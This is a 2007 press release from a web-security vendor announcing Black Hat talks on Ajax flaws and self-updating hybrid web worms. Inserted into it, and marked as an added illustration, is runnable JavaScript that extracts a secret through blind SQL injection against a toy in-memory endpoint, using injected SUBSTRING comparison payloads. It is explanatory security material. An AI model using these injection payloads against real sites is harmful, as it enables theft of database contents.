SPI Dynamics Expert Researchers to Demonstrate Hacking Ajax Web Applications and the Latest in Hybrid Web Application Worm Threats at Black Hat USA 2007


Company's Security Evangelist, Michael Sutton, Will Take Part in Book Signing for the Release of "Fuzzing: Brute Force Vulnerability Discovery"

ATLANTA, July 23 / -- S.P.I. Dynamics, Inc. (http://www.spidynamics.com/), the leading provider of web application security, today announced that two of the company's expert researchers will present the latest in hacking web applications at the upcoming Black Hat USA 2007 conference at Caesars Palace in Las Vegas, Nevada, August 1-2. As at last year's successful event, this year's Black Hat includes a significant number of talks focused specifically on web application security, underscoring the impact that rapidly evolving application development technologies such as Ajax are having on today's security industry.

The popularity of Ajax is growing rapidly because it makes web applications far more usable. Unfortunately, far too many teams rush into Ajax development without considering its security ramifications: Ajax greatly amplifies the same classes of vulnerability found in more traditional web applications. Bryan Sullivan, Ajax expert and Senior Security Researcher in SPI Dynamics' SPI Labs research division, will present on Ajax security alongside Billy Hoffman, Lead SPI Labs Security Researcher and Ajax expert. The talk, titled "Premature Ajax-ulation," is scheduled for Wednesday, August 1st from 3:15 to 4:30 p.m. PT.

This presentation will demonstrate specific Ajax application design flaws that stem from a disregard for security, including improper use of client-side XSLT, server-side APIs that are either too coarse- or too fine-grained, and secrets (data or functionality) stored in client-side code. The session will also demonstrate exploits of these weaknesses, including vastly more efficient Blind SQL and Blind XPath injection techniques, detecting and exploiting race conditions, and applying static analysis to deobfuscate client-side JavaScript. Finally, it will explore when to use Ajax and when to avoid it, and how third-party frameworks can actually make matters worse by hiding potential security issues without truly resolving them.

Messrs. Sullivan and Hoffman will also debut a portion of their forthcoming book, Ajax Security (Addison-Wesley Professional), at Black Hat; it will be available to conference attendees at the SPI Dynamics booth (#9).

Hoffman will co-present a second talk with John Terrill, Executive Vice President and Co-founder of Enterprise Management Technology LLC, on the latest in web application hybrid worms. The talk, titled "The Little Hybrid Web Worm that Could," is scheduled for Thursday, August 2nd from 11:15 a.m. to 12:30 p.m. PT. The presentation will discuss the rise in sophisticated web worm attacks over the past year and the basic limitations of their methods, notably that they can be detected with signatures, which makes them annoying but ultimately controllable. It will then examine how web worms could evolve to overcome these limitations, describing a hybrid web worm that combines server-side and client-side languages to exploit both the web server and the web browser and so propagate across multiple hosts. It will also look at how such a worm could upgrade its infection methods while in the wild by fetching and parsing new web vulnerability information from public security sites, so that no single silver-bullet fix stops its propagation, and how web worms could use polymorphism and source code mutation to evade signature-based detection systems.

Messrs. Hoffman and Terrill will demo different parts of the worm in isolation to show how its features would function, with a specific look at how the worm could upgrade itself with publicly available vulnerability data and at source code mutation. Building on the methodology of the JavaScript vulnerability scanner Jikto, they will demonstrate DOMinatrix, a JavaScript payload that uses SQL injection to extract information from a web site's database. Finally, the presentation will discuss steps to prevent hybrid web worms from exploiting a web site or its users.
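Both abstracts above refer to extracting data from a database through blind SQL injection (the "vastly more efficient Blind SQL injection techniques" of the Ajax talk, and DOMinatrix's SQL-injection extraction). The page does not say how either works, so the following is an added illustration, not code from the speakers, SPI Labs, Jikto or DOMinatrix. It runs an injection payload against a constructed, in-memory stand-in for a vulnerable Ajax search endpoint: the `SECRET` value, the `products` table, the `vulnerableSearch` function and its toy SQL evaluator are all assumptions made for the example. The attacker only learns whether each response was empty, and the block contrasts guessing one character value per request with a binary search over the character code. That contrast is one well-known reason such payloads can become far cheaper; whether the speakers' technique works this way is not stated on the page.

```javascript
"use strict";

// Hypothetical value the attacker wants to read (constructed for the example).
const SECRET = "s3cr3t!";

// Stands in for the number of XMLHttpRequests a browser payload would send.
let requests = 0;

// Constructed stand-in for a vulnerable Ajax search endpoint.  A real server
// would interpolate the parameter into SQL exactly like this and return rows
// or nothing; the caller only sees whether the result set was empty.  Instead
// of a database, the toy evaluator accepts the untouched query for 'widget'
// plus one injected ASCII(SUBSTRING(secret,i,1)) comparison, so the payloads
// below can run offline.  Anything else is treated as "no rows".
function vulnerableSearch(term) {
  requests += 1;
  const sql = `SELECT name FROM products WHERE name = '${term}'`;
  const m = sql.match(
    /^SELECT name FROM products WHERE name = 'widget'(?: AND ASCII\(SUBSTRING\(secret,(\d+),1\)\) (>|=) (\d+)--')?$/
  );
  if (!m) return false;                 // no matching row
  if (m[1] === undefined) return true;  // plain search for 'widget' hits
  const code = SECRET.charCodeAt(Number(m[1]) - 1); // SUBSTRING is 1-based
  if (Number.isNaN(code)) return false; // past the end: NULL compares false
  return m[2] === ">" ? code > Number(m[3]) : code === Number(m[3]);
}

// Boolean oracle: one request per question about character i of the secret.
function oracle(i, op, n) {
  return vulnerableSearch(`widget' AND ASCII(SUBSTRING(secret,${i},1)) ${op} ${n}--`);
}

// Naive extraction: ask "is it this character?" for each printable ASCII
// value (32..126) until one matches; a position with no match ends the string.
function extractLinear() {
  requests = 0;
  let out = "";
  for (let i = 1; ; i++) {
    let found = null;
    for (let c = 32; c <= 126; c++) {
      if (oracle(i, "=", c)) { found = c; break; }
    }
    if (found === null) break;
    out += String.fromCharCode(found);
  }
  return { value: out, requests };
}

// Binary search: one request to test that a printable character exists at
// position i, then at most seven "greater than" questions to pin its code.
function extractBinary() {
  requests = 0;
  let out = "";
  for (let i = 1; oracle(i, ">", 31); i++) {
    let lo = 32, hi = 126;          // invariant: code is within [lo, hi]
    while (lo < hi) {
      const mid = Math.floor((lo + hi) / 2);
      if (oracle(i, ">", mid)) lo = mid + 1; else hi = mid;
    }
    out += String.fromCharCode(lo);
  }
  return { value: out, requests };
}

const lin = extractLinear();
const bin = extractBinary();
console.log(`linear: "${lin.value}" in ${lin.requests} requests`);
console.log(`binary: "${bin.value}" in ${bin.requests} requests`);
```

Each position's search is independent of the others once the string's length is known, so a browser-resident payload can issue the per-position searches concurrently with XMLHttpRequest rather than one after another, which is where the Ajax context makes the attack cheaper in wall-clock time as well as in request count. The toy endpoint is deliberately not fixed; the remedy for the real thing is a parameterized query that never splices `term` into SQL text.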

In addition, SPI Dynamics' Security Evangelist, Michael Sutton, will sign copies at Black Hat of his newly released book, Fuzzing: Brute Force Vulnerability Discovery, published by Addison-Wesley Professional and co-authored with Pedram Amini and Adam Greene. The signing will take place on Wednesday, August 1st from 3:00 p.m. to 3:15 p.m. PT. For more information on Fuzzing: Brute Force Vulnerability Discovery, please visit www.awprofessional.com/bookstore/product.asp?isbn=0321446119&rl=1 .

For more information on SPI Dynamics, please visit www.spidynamics.com/ .

About S.P.I. Dynamics, Inc.

SPI Dynamics' comprehensive suite of products and services identifies and remediates web application and web services security vulnerabilities throughout the application development lifecycle. These award-winning solutions also enable security professionals, QA testers and developers to work together to verify compliance with 22 security policies such as SOX, HIPAA and PCI. SPI Dynamics has the most application security testing customers worldwide - over 1,000 clients among Global 2000 enterprises, including four of the five largest banks in the world and nine of the 10 largest banks in the U.S., four of the five largest software companies, three of the four largest aerospace and defense companies, the four largest accounting firms, the five largest telecommunications companies in the U.S., six of the eight largest technology hardware and equipment companies, two of the three largest healthcare companies, and over 90 U.S. Federal agencies. The company is one of the fastest growing in the security industry, ranked 83rd on Deloitte's "Fast 500" list of growing technology companies nationwide and 220th on the Inc. 500. SPI Dynamics has strategic partnerships with Microsoft, IBM, HP and Visa. The company's R&D team, SPI Labs, is widely recognized as one of the leading authorities on web application security and risk management. For more information, visit www.spidynamics.com or call (866) 774-2700.

Source: S.P.I. Dynamics, Inc.

CONTACT:
Michelle Schafer of Merritt Group
+1-703-390-1525
cell: +1-703-403-6377
schafer@merrittgrp.com
or
Ashley Vandiver of SPI Dynamics
+1-678-781-4841
cell: +1-404-432-8657
avandiver@spidynamics.com

Web site: www.spidynamics.com/
